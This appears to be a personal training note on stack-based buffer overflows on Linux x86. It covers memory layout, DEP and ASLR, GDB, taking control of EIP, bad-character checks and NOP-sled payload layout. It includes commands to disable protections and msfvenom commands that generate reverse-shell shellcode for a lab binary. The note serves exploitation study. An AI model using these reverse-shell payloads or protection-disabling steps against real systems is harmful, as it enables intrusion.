/ Offensive Security / Exploitation / Stack-Based Buffer Overflows on Linux x86.md
Stack-Based Buffer Overflows on Linux x86.md
  1  ---
  2  abbr:
  3    - "IoT: Internet of Things"
  4    - "DEP: Data Execution Prevention"
  5    - "ASLR: Address Space Layout Randomization"
  6    - "ROP: Return Oriented Programming"
  7    - " GDB: GNU Debugger"
  8    - "FP: Frame Pointer"
  9    - "SP: Stack Pointer"
 10    - "EIP: Extended Instruction Pointer"
 11    - "EBP: Extended Base Pointer"
 12    - "NOPS: No Operation Instruction"
 13    -
 14  ---
 15  ## Introduction
 16  
 17  Buffer overflow is not so common now but it is still widely use in embedded device and IoT
 18  
 19  Buffer overflows also could occur in web applications. [Read more here](https://www.bleepingcomputer.com/news/security/you-can-bypass-authentication-on-hpe-ilo4-servers-with-29-a-characters/)
 20  
 21  If too much data is written to a reserved memory buffer or stack that is not limited, specific registers will be overwritten and that could allow code to be executed.
 22  
 23  Buffer overflow could:
 24  - Cause a program to crash
 25  - Corrupt data
 26  - Harm data structures in the program runtime
 27  - Overwrite specific program's return address with the vulnerable process's privileges
 28  
 29  Most modern programming language are not vulnerable to buffer overflow because it has [garbage collection](https://www.perplexity.ai/search/is-rust-also-vulnerable-to-buf-nk.nKBmiQHKGBdUieS7DAw#2)
 30  
 31  **Return address** are stored in memory, it points to other memory addresses. If this is overwritten, you can have the return address point to another function/subroutine
 32  
 33  ![[Pasted image 20250407132053.png]]
 34  
 35  **.text**
 36  	Stores the actual assembler instructions for the program. This area is read-only. Attempt to write to it will cause a segmentation fault
 37  
 38  **.data**
 39  	Stores global and static variable explicitly initialised by the program
 40  
 41  **Heap**
 42  	Heap memory stored here. Starts after **.bss** section and will go to the higher memory address
 43  
 44  **Stack**
 45  	*Last-In-First-Out*. Where local variables are stored in [[C]]/[[C++]]. Defined area inside [[RAM]]. Contents are accessed via the *stack pointer*. 
 46  
 47  ### Modern memory protections
 48  
 49  Modern memory protections [[DEP]]/[[ASLR]] would prevent damage caused by buffer overflow. 
 50  
 51  [[Canary]] would allow the [[Operating System|os]] to detect for buffer overflows 
 52  
 53  #### DEP
 54  
 55  [[DEP]] would mark regions of memory as "Read-Only". 
 56  
 57  This read-only memory is where some user-input is stored(Stack)
 58  
 59  The idea of [[DEP]] is to prevent user from uploading shell code into memory and setting the instruction pointer to the shellcode
 60  
 61  To get around this, instead of writing it to stack, hackers write into an executable space(like .text) and use existing call to call them. This is called ROP
 62  
 63  #### ASLR
 64  
 65  With ROP, attacker will need to know where in memory things are stored in, [[ASLR]] was used to implement against it
 66  
 67  A way to get around [[ASLR]] was to leak memory addresses but it is not something easy to be done
 68  
 69  ### Vulnerable Program
 70  
 71  `strcpy()` is vulnerable to buffer overflow because it does not check the size of the destination and will keep on writing till the source is terminated. [Read more](https://www.perplexity.ai/search/why-is-strcpy-vulnerable-to-bu-h6ANjBEUR5qEK4UeKWq8Wg#0)
 72  
 73  To compile a vulnerable [[C]] program, you need to disable [[ASLR]] 
 74  `echo 0 ) /proc/sys/kernel/randomize_va_space`
 75  
 76  To compile a [[C]] program with [[DEP]] disabled,
 77  `gcc input.c -o output -fno-stack-protector -z execstack -m32`
 78  
 79  There are more vulnerable [[C]] functions:
 80  - `gets`
 81  - `sprintf`
 82  - `scanf`
 83  - `strcat`
 84  
 85  ### GDB Introductions
 86  
 87  [[GDB]] provides us with breakpoints or stack trace output and allows us to intervene in the execution of programs
 88  
 89  [[GDB]] can be used to view the created binary on the assembly level
 90  
 91  To set the default flavor (Intel or AT&T) use 
 92  `echo 'set disassembly-flavor (flavor) ) ~./.gbdinit`
 93  
 94  Below is the format of the output from using the command `disassemble main` in [[GDB]]
 95  
 96  | Memory Address(br) | Address Jumps | Assembler Instruction | Operation Suffixes |
 97  | ------------------ | ------------- | --------------------- | ------------------ |
 98  
 99  ### CPU Registers
100  
101  [[CPU]] registers can be split into:
102  - General registers
103  - Control registers
104  - Segment registers
105  
106  Data registers can be split into Data registers, Pointer registers and Index registers
107  
108  #### Data registers
109  
110  | **32-bit Register** | **64-bit Register** | **Description**                                                                                             |
111  | ------------------- | ------------------- | ----------------------------------------------------------------------------------------------------------- |
112  | `EAX`               | `RAX`               | Accumulator is used in input/output and for arithmetic operations                                           |
113  | `EBX`               | `RBX`               | Base is used in indexed addressing                                                                          |
114  | `ECX`               | `RCX`               | Counter is used to rotate instructions and count loops                                                      |
115  | `EDX`               | `RDX`               | Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values |
116  
117  #### Pointer registers
118  
119  | **32-bit Register** | **64-bit Register** | **Description**                                                                                             |
120  | ------------------- | ------------------- | ----------------------------------------------------------------------------------------------------------- |
121  | `EIP`               | `RIP`               | Instruction Pointer stores the offset address of the next instruction to be executed                        |
122  | `ESP`               | `RSP`               | Stack Pointer points to the top of the stack                                                                |
123  | `EBP`               | `RBP`               | Base Pointer is also known as `Stack Base Pointer` or `Frame Pointer` thats points to the base of the stack |
124  #### Index registers
125  
126  | **Register 32-bit** | **Register 64-bit** | **Description**                                                         |
127  | ------------------- | ------------------- | ----------------------------------------------------------------------- |
128  | `ESI`               | `RSI`               | Source Index is used as a pointer from a source for string operations   |
129  | `EDI`               | `RDI`               | Destination is used as a pointer to a destination for string operations |
130  
131  
132  ![[Pasted image 20250408130412.png]]
133  
134  
135  The FP points at the base of the stack, where the return value would end and it does not move.
136  
137  To get the args that is going to be used by addMe, we can add FP by 4 to get the return value and by 8 to get the first args and by 12 to get the second.
138  
139  **Keep in mind that the stack moves from high memory to low memory**
140  
141  [Read more about the Stack](https://0xinfection.github.io/reversing/pages/part-15-stack.html)
142  
143  ## Take Control of EIP
144  
145  ```bash
146  gdb -q bow32
147  
148  (gdb) run $(python -c "print('\x55'*1200)")
149  ```
150  
151  This will overwrite the **EIP** and **EBP** as can be seen with the command:
152  `(gdb) info registers`
153  
154  This process can be imagined visually 
155  ![[Pasted image 20250408135346.png]]
156  
157  Since `strcpy()` does not check for the size of the source to the destination, it is vulnerable to buffer overflow
158  
159  We will be needing an exact number of input up to the EIP so that the following 4 bytes can be overwritten with our desired memory address
160  
161  To determine the offset, we use [[Metasploit]] exploit to create a pattern that would help us determine the number of bytes till we can write to the EIP
162  `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l (length) ) pattern.txt`
163  
164  Once we use the generated string as input in [[GDB]], we take the value of EIP and run it in [[Metasploit]] again
165  `/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q (memory of EIP)`
166  
167  ### Determine the Length for Shellcode
168  
169  Once we know the number of bytes needed to be able to write into EIP, we will be able to overwrite it with the address pointing to our shellcode's beginning
170  
171  ```bash
172  (gdb) run $(python -c "print('Aa0Aa1...')")
173  (gdb) info registers eip
174  ```
175  
176  Find out how big our shellcode will be using [[Metasploit|msfvenom]] 
177  `msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c`
178  
179  It is good practise to insert some NOPS before our shellcode
180  
181  To determine the length for the shellcode, we need:
182  	1. A total of (number) bytes to get to the EIP
183  	2. About 100 additional NOPS to before our shellcode
184  	3. A total of (number) bytes for shellcode
185  
186  Below is a breakdown for the size allocation
187  - Buffer = "\x55" * (bytes needed to reach EIP - NOPs - shellcode - EIP) 
188  - NOPS = "\x90" * 100
189  - Shellcode = "\x44" * 150
190  - EIP = "\x66" * 4
191  
192  ![[Pasted image 20250408164315.png]]
193  
194  ### Bad Character Identification
195  
196  Files in [[UNIX]]-like operating system have two bytes containing a **magic number** that determines the file type 
197  
198  Such reserved characters also exists in application, known as **bad characters**.
199  
200  These **bad character** can vary and we will see characters like these:
201  - `\x00` - Null Byte
202  - `\x0A` - Line Feed 
203  - `\x0D` - Carriage Return 
204  - `\xFF` - Form Feed
205  
206  There are **256 character** list that can be checked with to know which characters will cause the program to crash
207  
208  Use this formula from the previous section but replace the NOPS and Shellcode with CHARS
209  - Buffer = "\x55" * (bytes needed to reach EIP - total no of char(256) - EIP) 
210  - CHARS = "\x00\x01.....\xFF"
211  - EIP = "\x66" * 4
212  
213  We can't just execute the main function because it will crash without giving us the possibility to follow what happens in memory.
214  
215  To overcome this, we will set a breakpoint for the vulnerable function
216  `break (funcname)`
217  
218  Once we have put a breakpoint at the function we want, we run it with out chars
219  
220  Then we can look at the stack
221  `(gdb) x/2000xb $esp+500`
222  
223  Go through all the chars and take note which character is not there and remove it from the charlist and update the count of the Buffer
224  
225  ### Generating Shellcode
226  
227  To generate shellcode with [[Metasploit|msfvenom]], we can run 
228  `msfvenom -p linux/x86/shell_reverse_tcp lhost=(lhost) lport=(lport) --format c --arch x86 --platform linux --bad-char "bad-chars" --out (filename)`
229  
230  Below is a breakdown for the size allocation
231  - Buffer = "\x55" * (bytes needed to reach EIP - NOPs - shellcode - EIP) 
232  - NOPS = "\x90" * 100
233  - Shellcode = "\x44....."
234  - EIP = "\x66" * 4
235  
236  Since we still have control over the EIP, we can tell it to jump to a memory address of our NOPS sled
237  
238  **Make sure to know the system uses little-endian or big-endian**